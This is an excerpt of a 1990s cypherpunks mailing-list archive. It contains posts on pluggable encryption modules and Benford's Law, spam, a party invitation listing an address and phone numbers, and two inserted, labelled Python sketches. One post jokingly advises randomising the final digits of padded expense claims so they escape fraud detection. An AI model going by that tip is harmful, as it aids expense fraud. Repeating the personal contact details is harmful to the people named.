    insecurely or securely as their paranoia dictates.

    Also, as new encryption algorithms are invented and coded,
    hackers who like to optimize may take the extra step and
    make their code CP compliant.  And command line Alice will
    be able to type:

        GENPGP -add_module BlowFish.mod

Q.  What are the disadvantages?

A.  At first blush, one disadvantage is that options like PGP's -m
    (for your eyes only) are not practical for a standard such
    as the one I am proposing.  But then again, even using the
    command:

        PGP -em susan.doc

    is little more than a suggestion to the recipient of
    the letter to not keep the plaintext around.

Q.  Why should we?

A.  If we don't, IEEE or some other organization is
    bound to, and IEEE seems to be getting more politically
    correct as the years pass, and this doesn't seem to
    be compatible with the purpose of an encryption module
    standard.

    Consequently, I believe that such a task should be initiated
    and taken to completion by a renegade group such as the
    cypherpunks, by committee if possible, with the hopes that
    government moles will not weaken our effort.

Mike Morgan


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMNBuvbwEeVpjJyiBAQEi5QP/T9FmRS2nwWq0lr9iT+cQWMEMV1++Hpf3
u0OWnYYFlRjgJPxTa5vT549tgGeRGV+CB+TI6N3Aj96+LTWb34qS5Y0W2x7R5FEg
+XnACQRs9G5qIK4Zn114KlWXyx7Mj0QQCeo4h86gISdrWkfSJiYkwEoGgzcf6ocF
gp45YZLznnk=
=cMFk
-----END PGP SIGNATURE-----
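
Added example, not part of Mike Morgan's message and not code from any existing program: a Python sketch of the module-receptacle idea in which the message carries an authenticated list of the modules used, and the receiver refuses a module it lacks or has retired as weak. The module names, container layout and function names are hypothetical, the "toy" stream transform is a stand-in rather than a real cipher, and a session key shared in advance replaces the RSA step.

```python
import hashlib
import hmac
import json
import zlib


class ModuleError(Exception):
    """The message names a module the receiver lacks or has retired."""


class IntegrityError(Exception):
    """The header or body failed authentication."""


def toy_stream(label):
    """Build a self-inverse XOR-keystream transform (stand-in, NOT a real cipher)."""
    def transform(data, key):
        stream = bytearray()
        counter = 0
        while len(stream) < len(data):
            block = label + key + counter.to_bytes(8, "big")
            stream += hashlib.sha256(block).digest()
            counter += 1
        return bytes(a ^ b for a, b in zip(data, stream))
    return transform


def new_registry():
    """Modules a fresh install starts with: name -> (forward, inverse)."""
    return {
        "zlib": (lambda d, k: zlib.compress(d), lambda d, k: zlib.decompress(d)),
        "toy-a": (toy_stream(b"a"), toy_stream(b"a")),
    }


def add_module(registry, name, forward, inverse):
    """The post's -add_module step: plug a new algorithm in under a name."""
    registry[name] = (forward, inverse)


def _subkey(key, purpose):
    # Each module and the MAC get an independent key derived from the session key.
    return hmac.new(key, purpose.encode(), hashlib.sha256).digest()


def _tag(key, header, body):
    mac = hmac.new(_subkey(key, "mac"), header + b"\n" + body, hashlib.sha256)
    return mac.hexdigest().encode()


def seal(plaintext, key, chain, registry):
    """Apply the modules in `chain` in order; emit header, MAC tag and body."""
    body = plaintext
    for name in chain:
        body = registry[name][0](body, _subkey(key, "module:" + name))
    header = json.dumps({"v": 1, "chain": chain}).encode()
    return header + b"\n" + _tag(key, header, body) + b"\n" + body


def open_sealed(blob, key, registry, retired=()):
    """Authenticate first, then check every named module before undoing any."""
    try:
        header, tag, body = blob.split(b"\n", 2)
    except ValueError:
        raise IntegrityError("malformed container")
    # The chain list is covered by the MAC, so it cannot be rewritten in transit.
    if not hmac.compare_digest(tag, _tag(key, header, body)):
        raise IntegrityError("header or body was modified")
    chain = json.loads(header)["chain"]
    for name in chain:
        if name in retired:
            raise ModuleError("module retired as weak: " + name)
        if name not in registry:
            raise ModuleError("module not installed: " + name)
    for name in reversed(chain):
        body = registry[name][1](body, _subkey(key, "module:" + name))
    return body


if __name__ == "__main__":
    key = b"constructed session key"           # constructed sample value
    alice, bob = new_registry(), new_registry()
    add_module(alice, "toy-b", toy_stream(b"b"), toy_stream(b"b"))
    blob = seal(b"topsec.doc contents", key, ["zlib", "toy-a", "toy-b"], alice)
    try:
        open_sealed(blob, key, bob)
    except ModuleError as err:
        print("Bob before adding the module:", err)
    add_module(bob, "toy-b", toy_stream(b"b"), toy_stream(b"b"))
    print("Bob after adding the module:", open_sealed(blob, key, bob))
```
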




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: viking@pacifier.com (Robert East)
Date: Thu, 9 Nov 1995 15:26:39 +0800
To: cypherpunks@toad.com
Subject: Register
Message-ID: <m0tDQkJ-0008ySC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Register

I'd like to sign up for email

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "lstewart" <lstewart@prisminc.com>
Date: Sat, 30 Dec 1995 08:45:21 +0800
To: strata@virtual.com
Subject: Housewarming/birthday party
Message-ID: <9502157953.AA795307204@prisminc.prisminc.com>
MIME-Version: 1.0
Content-Type: text/plain



     You're invited to celebrate
     Laura and Bill's New Home
     Bill's Birthday
     and anything else you'd like to celebrate!
     Date:  Saturday, January 13
     Time:  5:00pm (or whenever)
     Putative location:  2040 Rock Ave. #22, Mountain View, CA
     RSVP (acceptances):  lstewart@prisminc.com, or Laura Stewart at work: 
     408-744-3359. 
      
     What to bring:  If you RSVP by Jan 12, don't bring anything!  We'll 
     provide something resembling dinner.  If you don't RSVP, bring food or 
     drink.  You are welcome to bring your family or other guests, but 
     please do not forward this invitation to other mail lists.  Smoking is 
     prohibited, laptop computers tolerated, board games warmly encouraged.
     
     How to get there (all directions are written as if 101 really went 
     north and south):
                          HOW TO FIND THE APARTMENT
     
     The address is 2040 W. Middlefield #22, but ignore that fact.  It is 
     much easier to find if you firmly believe that the address is 2040 
     Rock Ave. #22.  From the corner of Rock & Rengstorff, follow the big 
     lighted "2040" numbers along Rock.  Just after the second driveway on 
     Rock you will find a walkway into the complex...follow the walkway to 
     #19, then climb the stairs to #22.
     
                 HOW TO FIND THE CORNER OF ROCK & RENGSTORFF
     
     Cypherpunks:  From La Castena (the burrito place), just go one block 
     "west" on Rengstorff.
     
     From Highway 101 southbound:  Take Rengstorff exit, which makes a 
     180-degree loop.  Turn left onto Rengstorff westbound (away from the 
     bay, toward the ocean).   One block after Old Middlefield (and one 
     block before Middlefield), turn left on Rock Ave and park on Rock.  
     See above to find the apartment.
     
     From Highway 101 northbound:  Ignore the Middlefield exit.  Take 
     Rengstorff exit, which makes a 270-degree loop and merges onto 
     Rengstorff westbound (away from the bay, toward the ocean).   One 
     block after Old Middlefield (and one block before Middlefield), turn 
     left on Rock Ave. and park on Rock.  See above to find the apartment.
     
     From 680 at Dumbarton exit:  Taking the Dumbarton bridge to 101 is a 
     few minutes faster, but it's easy to get lost between the bridge and 
     101.  Unless you're familiar with the area, we recommend taking 680 to 
     237, west on 237 to 101, and north on 101 to the Rengstorff exit, 
     which makes a 270-degree loop and merges onto Rengstorff westbound 
     (away from the bay, toward the ocean).   One block after Old 
     Middlefield (and one block before Middlefield), turn left on Rock Ave. 
     and park on Rock.  See above to find the apartment.
     
     Further complications..er, clarifications:  Rock Ave. and Rock St. are 
     the same thing.  Middlefield Road and Old Middlefield Road are two 
     different things.
     
                   Middlefield  Rock       Old Middlefield    101
       ^             |          |           |                 |  
       |             |          |           |                 |  
     "North"         |          |           |                 |        the
                     |          |           |                 |        bay
     Rengstorff-----------------------------------------------------
                     |  _______ |           |                 |  
                     | [    2  ]|           |La               |  
                     | [    0  ]|           |Castena          |  
                     | [    4  ]|           |                 |  
                     | [    0  ]|           |                 |  
                     | [_______]|           |                 |  
                     |      #22 |           |                 |             
                     |          |           |                 |  
                     |          |           |                 |  
     
     
     
     
     Lost on the day of the party?  Call us at home: 415-938-1697.
     
     The price of condo living: There is no guest parking in the complex, 
     and the party must end by 10pm.  Please help us get along with our new 
     neighbors by respecting the condo rules.  Thanks!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peng-chiew Low <pclow@pc.jaring.my>
Date: Sun, 10 Mar 1996 01:36:22 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: S/MIME outside the US?
In-Reply-To: <199602290845.AAA03948@ix4.ix.netcom.com>
Message-ID: <2F550373.CEA@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> 
> At 10:49 PM 2/24/96 -0500, Lewis  wrote:
> I'm assuming from volley's address that he or she is in Sweden,
> and thus not directly limited by US export laws.  Write what you want,
> and post it somewhere outside the US; we can import it legally.
> As a non-American, you probably couldn't get US export permission for
> even 40-bit RC4, and maybe not even for rot13.

	Lurk Mode Off.......
	
	I don't suppose there's anyone out there who may be 
	interested in working with a non-American InfoSec
	integrator in integrating encryption with email
	/messaging and other applications? 

	I assume that there is a legal difference between 
	"working with" and "developing for" AFA ITAR is 
	concerned.

	Thanks........Lurk Mode On.......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: max.muzi@altair.it (Max Muzi)
Date: Sat, 9 Mar 1996 04:49:25 +0800
To: cypherpunks@toad.com
Subject: question re. PGP CharSet
Message-ID: <96030819291115648@altair.it>
MIME-Version: 1.0
Content-Type: text/plain



Apparently, the mechanism for overriding PGP configuration settings by
means of command-line arguments  does not work properly with the
option "charset" (at least with version 2.6.1i). Anyone know why?
Actually, PGP does understand the option "+charset", as it does not
yield an "invalid argument" error message, but it looks like it does
not take that option into consideration.

While I know most people need not switch from one charset to another
every day, some of them (like me) have not completely migrated to
Windows yet and would still like to use the MS-DOS standard charset
(cp850) from time to time without having to re-edit or substitute
the PGP config file each time. But I guess it's not possible, is it?

Thanks,

Max

PS: [off-topic] Anybody know how one can have the MS-DOS keyboard
driver use the standard Windows char table (LATIN1 aka iso-8859-1)?

~~
Massimiliano Muzi ['mu:tsi] <max.muzi@altair.it>
http://www.geocities.com/Athens/2027/max-muzi.html
PGP public key available on keyservers.
"Eternal nothingness is OK if you are dressed for it"

msg date/time: Friday 8 March 1996, 12:38 GMT+1









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leonardo Machado <diarioam@ronet.com.br>
Date: Tue, 19 Mar 1996 23:32:52 +0800
To: cypherpunks@toad.com
Subject: DESCRIBE
Message-ID: <2F6BBFDA.5DF7@ronet.com.br>
MIME-Version: 1.0
Content-Type: text/plain


undescribe cypherpunks@toad.com cyber@ronet.com.br




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eriksmit <eriksmit@euronet.nl>
Date: Tue, 16 Apr 1996 06:26:21 +0800
To: Clay Olbon II <olbon@dynetics.com>
Subject: Re: [NOISE] Consolidation of threads ...
In-Reply-To: <v01540b0cad96f6491958@[193.239.225.200]>
Message-ID: <2F902565.27A6@euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II wrote:
> 
> OK, I have a proposal that consolidates two threads that have been
> discussed recently.  How about proposing legislation that mandates that a
> byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
> decent/indecent bit, thereby solving all of our problems.
> 
>         Clay
> 
> ---------------------------------------------------------------------------
> Clay Olbon II            | Clay.Olbon@dynetics.com
> Systems Engineer         | ph: (810) 589-9930 fax 9934
> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
> 550 Stephenson Hwy       | PGP262 public key: on web page
> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>                      TANSTAAFL
> ---------------------------------------------------------------------------

Get me off from the list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nwosuck@harpo.wh.att.com (Kingsley Nwosu)
Date: Thu, 11 May 95 17:35:05 -0500
To: Multiple recipients of list <dbworld@cs.wisc.edu>
Subject: (DBWORLD) Massive Digital  Data Systems
Message-ID: <bdcb7bc60b8f75ebbacc7f98f7afa8aa@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Birds of a Feather Session on the
Intelligence Community Initiative in
Massive Digital  Data Systems

To be held in Conjunction with the 1995 ACM  SIGMOD International Conference on 
Management of Data

in the Crystal Room at The Fairmont Hotel, San Jose, California
on Tuesday, 23 May 1995 from 7 pm to 9 pm

*******************************

Massive Digital Data Systems (MDDS) will require effective management,
retrieval, and integration of databases that may be heterogeneous.  Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management.  While several advances
have been made in database management technology, the complexity and the size
of the database coupled with the unique needs of the Intelligence Community
(IC) require the development of novel approaches.  The MDDS Initiative has
been started by the  Community Management Staff (CMS) of the IC to identify
the data management issues and challenges as well as to develop possible
solutions for  managing massive databases.

The purpose of the Birds of a Feather Session is to provide an overview of the
MDDS program, solicit input toward developing a testbed /framework for the 
initiative, and to have  technical discussions  on novel methods for managing
massive databases.  Tentative agenda for the  session is as follows:

1. Overview of MDDS  Initiative 
2. Overview of MDDS  Research Projects 
3.  Discussion on testbed/framework 
4.  Discussion on techniques for massive database management 

Information on the MDDS Initiative can be obtained from : 
http://www.nml.org/other_programs/mdds/mdds.html

For more information contact:
Dr. Bhavani Thuraisingham
K329, The MITRE Corporation, Burlington Road, Bedford, MA 01730
email: thura@mitre.org; Phone: 617-271-8873; Fax: 617-271-2352 







-------------------------------------------------------------------------------
The dbworld alias reaches many people, and should only be used for
messages of general interest to the database community. 

Requests to get on or off dbworld should go to listproc@cs.wisc.edu.

  to subscribe send 
	subscribe dbworld Your Full Name

  to unsubscribe send
	unsubscribe dbworld

  to change your address
	send an unsubscribe request from the old address
	send a subscribe request from the new address

  to find out more options send 
	help
------------------------------------------------------------------------FOOTER-







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bhavani Thuraisingham" <Bhavani_Thuraisingham@qmgateib.mitre.org>
Date: Tue, 16 May 95 18:51:40 -0500
To: Multiple recipients of list <dbworld@cs.wisc.edu>
Subject: (DBWORLD) MDDS Session Time Change
Message-ID: <3e7ba8f1fcfb5078b6cb77ea1ae5fb8c@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


                                           5/15/95            5:17 PM
                                           MDDS Session Time Change

Birds of a Feather Session on the
Intelligence Community Initiative in
Massive Digital  Data Systems

Held in Conjunction with the 1995 ACM  SIGMOD International Conference on 
Management of Data

in the Crystal Room at The Fairmont Hotel, San Jose, California
on Tuesday, 23 May 1995 from 7:30 pm to 9:30 pm

*******************************

Massive Digital Data Systems (MDDS) will require effective management,
retrieval, and integration of databases that may be heterogeneous.  Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management.  While several advances
have been made in database management technology, the complexity and the size
of the database coupled with the unique needs of the Intelligence Community
(IC) require the development of novel approaches.  The MDDS Initiative has
been started by the  Community Management Staff (CMS) of the IC to identify
the data management issues and challenges as well as to develop possible
solutions for  managing massive databases.

The purpose of the Birds of a Feather Session is to provide an overview of the
MDDS program, solicit input toward developing a testbed /framework for the 
initiative, and to have  technical discussions  on novel methods for managing
massive databases.  Tentative agenda for the  session is as follows:

1. Overview of MDDS  Initiative 
2. Overview of MDDS  Research Projects 
3.  Discussion on testbed/framework 
4.  Discussion on techniques for massive database management 

Information on the MDDS Initiative can be obtained from : 
http://www.nml.org/other_programs/mdds/mdds.html

For more information contact:
Dr. Bhavani Thuraisingham
K329, The MITRE Corporation, Burlington Road, Bedford, MA 01730
email: thura@mitre.org; Phone: 617-271-8873; Fax: 617-271-2352 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 68864320@canma.dyn.ml.org
Date: Fri, 25 Jul 1997 13:15:31 -0700 (PDT)
To: mail@you.com
Subject: Important Financial Information...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


>>> PAY OFF ALL YOUR BILLS! <<<

Including your mortgage in 3-7 years...
Using your current income!

People have become slaves to their debts.
It's a never ending circle of go to work - pay the
bills - go to work...

>>> NOW THERE IS A WAY OUT! <<<

A proven system used by more than 150,000
people in the USA and Canada.

Find Out How - With Our FREE Information

You have nothing to lose (except your debts) by
requesting the FREE information!

For immediate  FREE  information, send any message to
freeinfo6@answerme.com, and our automatic response
E-mail address will send you a FREE report within minutes.

Get started on your debt-free journey today.

Also, you'll learn how you can... JOIN OUR TEAM & EARN A
FANTASTIC RESIDUAL INCOME!

**********************************************************************
If you would like to learn about advertising your own product or
service on the internet then please visit this Web site:

http://www.amv-inc.com

**********************************************************************

If you wish to be removed from this mailing list, please write us at:
remove@alderney.dyn.ml.org
Thank you.

**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 05551984@turboma.dyn.ml.org
Date: Sun, 27 Jul 1997 17:12:43 -0700 (PDT)
To: mailee@morenet.net
Subject: About your online business.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


---> Do you run an online BUSINESS?
---> Are you interested in electronic MARKETING?
---> Do you want to dramatically INCREASE your SALES?

Keep reading... we will explain to you how your business can take
advantage of bulk e-mail's incredible power!

Dear fellow online entrepreneur,

     If you're like me, you're certainly very enthusiastic about
the Internet's possibilities. However, we all know that the
biggest challenge is to give our sales material a decent
visibility. With all those competitors around, you must take
action to reach out for customers, to directly reach your
potential buyer.

     You probably already tried dozens of different ways to
promote your online business... Search Engines are now overloaded
and unlikely to bring much business... Online Malls are expensive
and they often won't bring you sales... Newsgroups promotion is
now out of question.

     You need a media that directly reaches out for the customer.
You need to use bulk e-mail. Imagine... your sales pitch sent to
thousands of potential buyers. It's almost like a virtual flyer
distribution.

     And the best part is that you won't have to spend much to
take advantage of this incredible marketing tool. Here's a
glimpse at our prices:
- 100,000 mailings:  only $69.95
- 1,000,000 mailings:  only $249.95

To get full details and contact information, just write any
message to our automatic autoresponder: siminfo@answerme.com
Again, all you have to do is to send us any e-mail at
siminfo@answerme.com
You will then receive all information via e-mail within minutes.

Bulk E-Mail will turbocharge your business.
Don't delay. Act now!

Yours truly,

Pierre Roussil - SIM Inc.

PS: Request the information NOW to take advantage of our HOT      
    limited time offer!

*****************************************************************
If you wish to be removed from our mailing list, please write us
at simrem@answerme.com . You will receive a removal confirmation
via e-mail. Thank you.
*****************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 68864320@canma.dyn.ml.org
Date: Fri, 25 Jul 1997 13:15:31 -0700 (PDT)
To: mail@you.com
Subject: Important Financial Information...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


>>> PAY OFF ALL YOUR BILLS! <<<

Including your mortgage in 3-7 years...
Using your current income!

People have become slaves to their debts.
It's a never ending circle of go to work - pay the
bills - go to work...

>>> NOW THERE IS A WAY OUT! <<<

A proven system used by more than 150,000
people in the USA and Canada.

Find Out How - With Our FREE Information

You have nothing to lose (except your debts) by
requesting the FREE information!

For immediate  FREE  information, send any message to
freeinfo6@answerme.com, and our automatic response
E-mail address will send you a FREE report within minutes.

Get started on your debt-free journey today.

Also, you'll learn how you can... JOIN OUR TEAM & EARN A
FANTASTIC RESIDUAL INCOME!

**********************************************************************
If you would like to learn about advertising your own product or
service on the internet then please visit this Web site:

http://www.amv-inc.com

**********************************************************************

If you wish to be removed from this mailing list, please write us at:
remove@alderney.dyn.ml.org
Thank you.

**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 05551984@turboma.dyn.ml.org
Date: Sun, 27 Jul 1997 17:12:43 -0700 (PDT)
To: mailee@morenet.net
Subject: About your online business.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


---> Do you run an online BUSINESS?
---> Are you interested in electronic MARKETING?
---> Do you want to dramatically INCREASE your SALES?

Keep reading... we will explain you how your business can take
advantage of bulk e-mail's incredible power!

Dear fellow online entrepreneur,

     If you're like me, you're certainly very enthusiast about
the Internet's possibilities. However, we all know that the
biggest challenge is to give our sales material a decent
visibility. With all those competitors around, you must take
action to reach out for customers, to directly reach your
potential buyer.

     You probably already tried dozens of different ways to
promote your online business... Search Engines are now overloaded
and unlikely to bring much business... Online Malls are expensive
and they often won't bring you sales... Newsgroups promotion is
now out of question.

     You need a media that directly reaches out for the customer.
You need to use bulk e-mail. Imagine... your sales pitch sent to
thousands of potential buyers. It's almost like a virtual flyer
distribution.

     And the best part is that you won't have to spend much to
take advantage of this incredible marketing tool. Here's a
glimpse at our prices:
- 100,000 mailings:  only $69.95
- 1,000,000 mailings:  only $249.95

To get full details and contact information, just write any
message to our automatic autoresponder: siminfo@answerme.com
Again, all you have to do is to send us any e-mail at
siminfo@answerme.com
You will then receive all information via e-mail within minutes.

Bulk E-Mail will turbocharge your business.
Don't delay. Act now!

Yours truly,

Pierre Roussil - SIM Inc.

PS: Request the information NOW to take advantage of our HOT      
    limited time offer!

*****************************************************************
If you wish to be removed from our mailing list, please write us
at simrem@answerme.com . You will receive a removal confirmation
via e-mail. Thank you.
*****************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mother Jones HTTP Daemon <http@mojones.mojones.com>
Date: Wed, 12 Jul 95 11:22:09 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: Your Beta Signup Confirmation
Message-ID: <199507121804.LAA18120@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


You're now a confirmed MoJo Wire Beta Tester
Username: cypherpunks
Password: cypherpunks
For now, look at <http://www.mojones.com:8040/>

Thanks for participating!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@coelacanth.com (Roger Williams)
Date: Wed, 12 Jul 95 19:14:13 PDT
Subject: Re: Is there a moderator in your future?
In-Reply-To: <9507102137.AA26662@spirit.aud.alcatel.com>
Message-ID: <rogerwxdprf5j.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9507102137.AA26662@spirit.aud.alcatel.com> droelke@spirit.aud.alcatel.com (Daniel R. Oelke) writes:

   > Why is Dyson of EFF enthusiastic about the concept?

   Because as moderators add value to the vast amount of stuff
   out there.  Why do some people pay to get a restricted subset
   of the cypherpunks?  Because they don't want the massive flow
   of wide open communications and they *trust* the person
   giving them the subset.  

   Moderators provide a great service, and it is finally being
   recognized as such in a monetary way.  I think that this 
   is a great thing!

I agree that moderated groups are useful at keeping the SNR high, and
are a great choice for those who can't or haven't time to set up their
own filters. However, they can't solve the problems that the Internet
is popularly supposed to have (e.g. no provisions for eliminating
parental responsibility).  Even supposing that US ISPs are *prohibited
by law* from carrying unmoderated Usenet groups, how does this address
all of the other services (current and future) that can be carried by
the Internet?  Sorry, the horse is out of the stable, and the only 99%
control option open to the government now is cutting the phone lines
at the border.

If an individual (e.g. a parent) wants to limit net access for certain
services to emasculated resources, perhaps Microsoft Restrict (TM) and
Prodigy can provide a desired service.  Otherwise, the solution to the
problem has to lie closer to home.

-- 
Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@nately.UCSD.EDU (Lance Cottrell)
Date: Tue, 11 Jul 95 11:40:01 PDT
To: perry@jpunix.com
Subject: Obscura down for a few days.
Message-ID: <9507111839.AA12751@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Obscura is suffering from HD troubles. The backups have failed so I am going to have to
rebuild it from scratch. This means that the web page and remailer will be down.
All mail to the remailers will be lost. I have changed the name server so
I will still get mail sent to loki@obscura.com.

	-Lance


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMALFV1Vkk3dax7hlAQHPvAP6A7IWAczKJ3eimrWUgh0F5DMEr7oSpAXg
lJJCC2VV4g9lIDD8C2wob1L6sEZwlDnUt6dMpbKBiT3aksSmBqnvMpe/BlaTd2zk
ZRGCYHUZkx3aOSp9iZevRhjI0HEdm+g2+PwjJcMyPn5EUmz5vnPI9exOt9VGyJV1
eSCCC3Ngz9k=
=ahD6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 11 Jul 95 11:52:02 PDT
To: cypherpunks@toad.com
Subject: Moby ints [Re: Num Rat]
In-Reply-To: <199507111749.KAA03281@ionia.engr.sgi.com>
Message-ID: <199507111851.LAA18222@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> pjm@ionia.engr.sgi.com (Patrick May) writes:
> This invocation of the name of the deity reminds me of a question
> I've been meaning to ask.  Is Knuth still a good source of algorithms
> for implementing large integers or do more recent books exist that
> contain superior methods?

While Knuth is now and forever the algorithm deity in general, Arjen
Lenstra is as close to godhood as one can get in moby ints these days.

I'd look at the Lip package Lenstra wrote; it's used in his state of the
art factoring programs.  It's available with masses of PostScript
documentation from ftp.ox.ac.uk.  Studying the code and docs might remind
you of some issues that aren't obvious... and, of course, you might decide
you don't need to write a moby int package, but could just use his library.

	Jim Gillogly
	Hevensday, 18 Afterlithe S.R. 1995, 18:48




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 11:16:17 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
Message-ID: <9507111813.AA0253@localhost>
MIME-Version: 1.0
Content-Type: text/plain



John Young posted:

>    He's Got Their Number: Scholar Uses Math to Foil Financial
>    Fraud
> 
>    By Lee Berton
>    Mark Negrini, an assistant professor of accounting at St.
>    Mary's University in Halifax, is trapping tax cheats, check
>    forgers and embezzlers with an obscure theory known as
>    Benford's Law. Formulated by physicist Frank Benford in
>    1938, the law lays out the statistical frequency with which
>    the numbers 1 through 9 appear in any set of random
>    numbers.
> 
>    Mr. Negrini applies the law to the numbers on suspicious
>    checks or tax returns. A series of legitimate check amounts
>    or tax write-offs will be genuinely random, while those
>    dreamed up by a human will not. If the numbers on the
>    checks or tax returns do not obey Benford's Law, they can't
>    be random, and "someone is taking the company to the
>    cleaners," Mr. Negrini says.

I just looked @ the front of a M.O. computer catalog & the numerals in the
prices are anything but random. A very heavy concentration of eights (8) &
nines (9), apparently this company is more into $508.98 (color inkjet printer)
& $38.98 (well known game s/w) than the old late night TV standby of
"JUST $19.99!". Of course, this is because of excessively documented
ad nauseam human psychological tendencies that salescritters, who set at
least the lsd's of price, have been aware of for millennia. I'd bet, that
5(five), 8(eight), & 9(nine) are significantly more represented across
the board in prices (& thus in amounts for checks & tax write offs)
than their random distribution by Benford's Law or more well known tests
for randomness would suggest. Has Mr. Negrini factored this into his program?
I guess the lesson is do a few pgp make__random's & convert a few of the
hex numbers to dec digits for the lsd's the next time one does creative expense
reporting.

tjh
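
Added example, not part of the original post: Benford's Law gives the expected frequency of each leading digit, P(d) = log10(1 + 1/d), so an audit of amounts can test leading digits against Benford and trailing digits against a uniform spread as two separate checks. The two sample sets (catalog-style prices ending in .98/.99, and invented amounts with evenly spread leading digits) are constructed for illustration, and all function names are this example's own.

```python
import math
from collections import Counter

# Chi-square critical values at the 5% level (standard table values).
CRIT_DF8 = 15.507   # leading-digit test: 9 bins -> 8 degrees of freedom
CRIT_DF9 = 16.919   # trailing-digit test: 10 bins -> 9 degrees of freedom


def benford_probs():
    """Benford's expected leading-digit probabilities for d = 1..9."""
    return {d: math.log10(1 + 1 / d) for d in range(1, 10)}


def chi_square(counts, probs, n):
    """Pearson chi-square statistic of observed counts against expected probabilities."""
    return sum((counts.get(k, 0) - n * p) ** 2 / (n * p) for k, p in probs.items())


def first_digit_stat(amounts_cents):
    """Leading digit of each amount, tested against Benford's Law."""
    counts = Counter(int(str(a)[0]) for a in amounts_cents)
    return chi_square(counts, benford_probs(), len(amounts_cents))


def last_digit_stat(amounts_cents):
    """Final cent digit of each amount, tested against a uniform distribution."""
    counts = Counter(a % 10 for a in amounts_cents)
    uniform = {d: 0.1 for d in range(10)}
    return chi_square(counts, uniform, len(amounts_cents))


def audit(amounts_cents):
    """Run both digit tests and flag whichever exceeds its 5% critical value."""
    fd = first_digit_stat(amounts_cents)
    ld = last_digit_stat(amounts_cents)
    return {
        "first_digit_chi2": fd,
        "first_digit_flag": fd > CRIT_DF8,
        "last_digit_chi2": ld,
        "last_digit_flag": ld > CRIT_DF9,
    }


def catalog_prices():
    """Constructed sample: dollar values spread evenly on a log scale from
    $10 to about $9,500, every price ending in .98 or .99 (amounts in cents)."""
    prices = []
    for i in range(150):
        dollars = int(10 * 10 ** (i / 50))
        cents = 98 if i % 2 == 0 else 99
        prices.append(dollars * 100 + cents)
    return prices


def invented_amounts():
    """Constructed sample: amounts whose leading digits 1..9 occur equally
    often, with final digits that happen to be evenly spread."""
    return [d * 10000 + 137 * j for j in range(20) for d in range(1, 10)]


if __name__ == "__main__":
    for name, data in (("catalog prices", catalog_prices()),
                       ("invented amounts", invented_amounts())):
        result = audit(data)
        print(name)
        print("  leading digits vs Benford: chi2=%.2f flagged=%s"
              % (result["first_digit_chi2"], result["first_digit_flag"]))
        print("  trailing digits vs uniform: chi2=%.2f flagged=%s"
              % (result["last_digit_chi2"], result["last_digit_flag"]))
```

On these samples the .98/.99 prices pass the leading-digit test and fail only the trailing-digit one, while the invented amounts do the reverse.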




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 11 Jul 95 12:22:22 PDT
To: hardin@cyberspace.com
Subject: Re: Num Rat
In-Reply-To: <9507111813.AA0253@localhost>
Message-ID: <Pine.LNX.3.91.950711131925.3058D-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

